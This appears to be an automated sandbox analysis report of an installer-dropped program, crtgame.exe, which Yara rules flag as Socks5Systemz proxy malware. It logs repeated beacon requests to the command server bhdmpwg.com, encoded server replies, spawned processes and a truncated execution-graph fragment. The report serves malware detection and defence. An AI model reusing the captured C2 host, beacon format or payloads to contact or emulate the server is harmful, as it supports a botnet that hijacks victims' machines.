                                                                        26192.168.2.54993694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:47.859289885 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:49.207911015 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:49.316361904 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:49.820957899 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:49.925767899 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:50.426228046 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.54994494.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:50.656239986 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:52.004081011 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:52.113394022 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:52.613415003 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:52.722951889 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:53.218858004 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.54995194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:53.453154087 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:54.800787926 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:54.910211086 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:55.411422014 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:55 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.54995794.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:55.655803919 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:57.005861044 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.54996294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:57.233951092 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:58.578170061 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.54996694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:58.814621925 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:04:00.162966013 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.54997294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:04:00.407417059 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:04:01.756186008 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:04:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.54997694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:04:01.986165047 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:04:03.336361885 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:04:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 35 30 61 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 38 30 61 34 38 39 65 34 65 31 37 64 61 66 30 61 32 38 63 62 64 62 61 32 37 63 61 36 37 36 30 37 63 35 30 63 36 64 32 34 66 64 63 34 61 34 32 64 32 34 37 39 65 34 35 65 64 34 64 65 32 62 33 66 36 34 65 39 38 35 64 39 33 33 63 31 66 39 62 32 36 39 64 35 38 39 38 39 61 32 32 32 34 36 34 34 39 61 31 32 31 32 30 37 32 63 38 39 65 36 33 33 33 38 39 38 61 64 62 32 62 35 38 35 32 38 65 63 35 30 37 66 66 31 33 63 34 64 63 35 63 62 33 32 36 33 34 31 36 35 31 64 35 35 65 32 30 64 64 34 31 66 61 33 62 39 64 34 62 34 30 61 34 32 38 65 61 61 35 31 61 39 62 35 64 34 36 61 34 62 36 62 64 38 63 66 66 63 39 61 32 35 37 65 61 66 61 62 37 39 38 64 66 32 64 33 61 38 61 30 62 62 63 33 31 65 66 36 66 31 38 61 31 62 64 36 30 61 64 30 62 64 35 62 36 37 38 39 38 31 34 61 34 63 63 39 35 32 36 34 62 39 65 62 39 63 66 32 64 39 39 65 32 39 63 65 31 31 38 66 31 34 63 64 66 35 33 32 66 63 35 32 31 61 66 39 62 32 [TRUNCATED]
                                                                        Data Ascii: 50ade2fe88e261d4749b96478393969f80739f80a489e4e17daf0a28cbdba27ca67607c50c6d24fdc4a42d2479e45ed4de2b3f64e985d933c1f9b269d58989a22246449a1212072c89e6333898adb2b58528ec507ff13c4dc5cb326341651d55e20dd41fa3b9d4b40a428eaa51a9b5d46a4b6bd8cffc9a257eafab798df2d3a8a0bbc31ef6f18a1bd60ad0bd5b6789814a4cc95264b9eb9cf2d99e29ce118f14cdf532fc521af9b26dd790b554e9bc3f5d0e671794b2131bc61ebbe22333aafd078663c10e09f645b40a040b2b3fbd836211a103c4cdc08d15c0f57ff11023b94f0c37d9289d58c114d33ceaf476ee6f170579cf75e9b1af3085a8220c4faba2550ed72cd642363a54eeaf7d2143319c2b887c2cdeb5172db521d990427d63d8cdd7e0841611e4b9fc00191c290386589d8dc387101b12645d9df374f1010b20df9ec6a579b5ceded190cb0aaf06b4f155693516ca2faafc3de1dad601ba23ae20167077b4edc53d9e91124955276ebc5cf8ce83dd3e7393b15ae600da0151388f6a908e9c5a80cc6b081eab26516f6c1b8c879332568b5799b965c249148862511ae5933b91a4a0cf22e8f62b6c5dfd898ba5a29fdc994bc681b0bac2432fefe8a20e5a190986e7913a88441e46ffcfcc93c246a78445d624867c97c5cafc0ef56a0ec316d5de5f6f8791b05011579b85391c798f0d877258 [TRUNCATED]
                                                                        Dec 14, 2024 03:04:03.336420059 CET262INData Raw: 35 33 34 33 30 66 63 38 32 31 30 32 65 64 65 31 33 36 37 66 35 62 30 31 33 39 33 33 35 62 32 66 37 34 62 38 63 30 66 36 36 39 31 64 39 64 34 36 30 64 61 37 39 62 64 38 66 63 33 31 30 35 61 61 34 64 34 38 38 36 64 37 36 66 35 37 62 66 37 36 66 61
                                                                        Data Ascii: 53430fc82102ede1367f5b0139335b2f74b8c0f6691d9d460da79bd8fc3105aa4d4886d76f57bf76faca9f1d3ec9c1a403f3a807941bc777ca3a97161551383ad0669fb6031ab9973f4ae41706475fe682478becf146043f5c3cb9af7ea9516e06d3962d4bc4fc9b43929c4e449efd754ed3baf9c534e08c61e


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.54998294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:04:03.708288908 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:04:05.046397924 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:04:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.54998694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:04:05.282936096 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:04:06.630875111 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:04:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:21:01:59
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\Desktop\j9htknb7BQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\j9htknb7BQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:7'246'011 bytes
                                                                        MD5 hash:168A4450EAF205FA20BCC2D0881C830F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:1
                                                                        Start time:21:01:59
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:704'000 bytes
                                                                        MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:3
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                        Imagebase:0x210000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:2'199'540 bytes
                                                                        MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                        Imagebase:0xbc0000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                        Imagebase:0x400000
                                                                        File size:2'199'540 bytes
                                                                        MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:21:02:02
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                        Imagebase:0x10000
                                                                        File size:139'776 bytes
                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:21.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.4%
                                                                          Total number of Nodes:1498
                                                                          Total number of Limit Nodes:22
                                                                          execution_graph 4978 409c40 5019 4030dc 4978->5019 4980 409c56 5022 4042e8 4980->5022 4982 409c5b 5025 40457c GetModuleHandleA GetProcAddress 4982->5025 4988 409c6a 5042 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4988->5042 5005 409d43 5104 4074a0 5005->5104 5007 409d05 5007->5005 5137 409aa0 5007->5137 5008 409d84 5108 407a28 5008->5108 5009 409d69 5009->5008 5010 409aa0 4 API calls 5009->5010 5010->5008 5012 409da9 5118 408b08 5012->5118 5016 409def 5017 408b08 21 API calls 5016->5017 5018 409e28 5016->5018 5017->5016 5147 403094 5019->5147 5021 4030e1 GetModuleHandleA GetCommandLineA 5021->4980 5024 404323 5022->5024 5148 403154 5022->5148 5024->4982 5026 404598 5025->5026 5027 40459f GetProcAddress 5025->5027 5026->5027 5028 4045b5 GetProcAddress 5027->5028 5029 4045ae 5027->5029 5030 4045c4 SetProcessDEPPolicy 5028->5030 5031 4045c8 5028->5031 5029->5028 5030->5031 5032 4065b8 5031->5032 5161 405c98 5032->5161 5041 406604 6F541CD0 5041->4988 5043 4090f7 5042->5043 5288 406fa0 SetErrorMode 5043->5288 5048 403198 4 API calls 5049 40913c 5048->5049 5050 409b30 GetSystemInfo VirtualQuery 5049->5050 5051 409be4 5050->5051 5052 409b5a 5050->5052 5056 409768 5051->5056 5052->5051 5053 409bc5 VirtualQuery 5052->5053 5054 409b84 VirtualProtect 5052->5054 5055 409bb3 VirtualProtect 5052->5055 5053->5051 5053->5052 5054->5052 5055->5053 5298 406bd0 GetCommandLineA 5056->5298 5058 409825 5060 4031b8 4 API calls 5058->5060 5059 406c2c 6 API calls 5062 409785 5059->5062 5061 40983f 5060->5061 5064 406c2c 5061->5064 5062->5058 5062->5059 5063 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5063->5062 5065 406c53 GetModuleFileNameA 5064->5065 5066 406c77 GetCommandLineA 5064->5066 5067 403278 4 API calls 5065->5067 5068 406c7c 5066->5068 5069 406c75 5067->5069 5070 406c81 5068->5070 5071 406af0 4 API calls 5068->5071 5074 406c89 5068->5074 5072 406ca4 5069->5072 5073 403198 4 API calls 5070->5073 5071->5068 5075 403198 4 API calls 5072->5075 5073->5074 5076 40322c 4 API calls 5074->5076 5077 406cb9 5075->5077 5076->5072 5078 4031e8 5077->5078 5079 4031ec 5078->5079 5082 4031fc 5078->5082 5081 403254 4 API calls 5079->5081 5079->5082 5080 403228 5084 4074e0 5080->5084 5081->5082 5082->5080 5083 4025ac 4 API calls 5082->5083 5083->5080 5085 4074ea 5084->5085 5319 407576 5085->5319 5322 407578 5085->5322 5086 407516 5087 40752a 5086->5087 5325 40748c GetLastError 5086->5325 5091 409bec FindResourceA 5087->5091 5092 409c01 5091->5092 5093 409c06 SizeofResource 5091->5093 5094 409aa0 4 API calls 5092->5094 5095 409c13 5093->5095 5096 409c18 LoadResource 5093->5096 5094->5093 5097 409aa0 4 API calls 5095->5097 5098 409c26 5096->5098 5099 409c2b LockResource 5096->5099 5097->5096 5100 409aa0 4 API calls 5098->5100 5101 409c37 5099->5101 5102 409c3c 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5102->5007 5134 407918 5102->5134 5103->5102 5105 4074b4 5104->5105 5106 4074c4 5105->5106 5107 4073ec 20 API calls 5105->5107 5106->5009 5107->5106 5109 407a35 5108->5109 5110 405880 4 API calls 5109->5110 5111 407a89 5109->5111 5110->5111 5112 407918 InterlockedExchange 5111->5112 5113 407a9b 5112->5113 5114 405880 4 API calls 5113->5114 5115 407ab1 5113->5115 5114->5115 5116 405880 4 API calls 5115->5116 5117 407af4 5115->5117 5116->5117 5117->5012 5127 408b82 5118->5127 5133 408b39 5118->5133 5119 407cb8 21 API calls 5119->5133 5120 408bcd 5433 407cb8 5120->5433 5121 407cb8 21 API calls 5121->5127 5124 408be4 5126 4031b8 4 